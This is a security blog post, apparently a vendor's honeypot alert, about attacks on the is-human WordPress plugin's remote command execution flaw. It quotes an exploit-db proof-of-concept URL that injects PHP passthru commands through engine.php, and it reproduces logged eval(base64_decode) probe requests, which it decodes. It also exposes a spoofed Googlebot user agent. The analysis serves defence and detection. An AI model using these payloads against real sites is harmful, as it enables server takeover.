[Honeypot Alert] Is-human Wordpress Plugin Remote Command Execution Attack Detected

Our web honeypot logs picked up an attack aimed at exploiting the Is-human Wordpress Plugin Remote Command Execution Vulnerability as described here on exploit-db:

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.# Date: 16.05.2011# Author: neworder [www.neworder-ind.net]# Software Link: http://wordpress.org/extend/plugins/is-human/# Version: 1.4.2# Tested on: Linux Platform The vulnerability exists in /is-human/engine.php . It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run out own code. In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands. Execution running the linux whoami command: http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

Here are the attacks that we received:

83.103.147.110 - - [13/Jan/2012:13:23:34 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:23:34 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:23:34 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:23:34 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:23:34 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:23:34 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:25:54 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:25:55 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:25:55 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:25:56 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:25:56 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:25:56 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:27:53 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:27:54 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:27:54 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:27:54 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:28:31 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:28:32 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:28:32 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:31:56 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"83.103.147.110 - - [13/Jan/2012:13:31:56 +0100] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

The PHP code execution section is:

;eval(base64_decode(ZWNobyAnPGJyPkpGcnlfJzsNCmVjaG8gJzxicj5BbmFzS2knOw));error

The base64_decoded text is:

echo '<br>JFry_';echo '<br>AnasKi';

This text is believed to be a reference to "Anaski Crew" hacking site/group and is assumed to be a test request probe to verify if the site is vulnerable to attack.

Also of note is the fake GoogleBot User-Agent string:

"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Following the "Verifying GoogleBot" data on Google's Support site, we can do a reverse DNS lookup and confirm that IP address 83.103.147.110 does not reside on the legitimate ".googlebot.com" domain:

# host 83.103.147.110110.147.103.83.in-addr.arpa domain name pointer server1.bacau.astral.ro.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.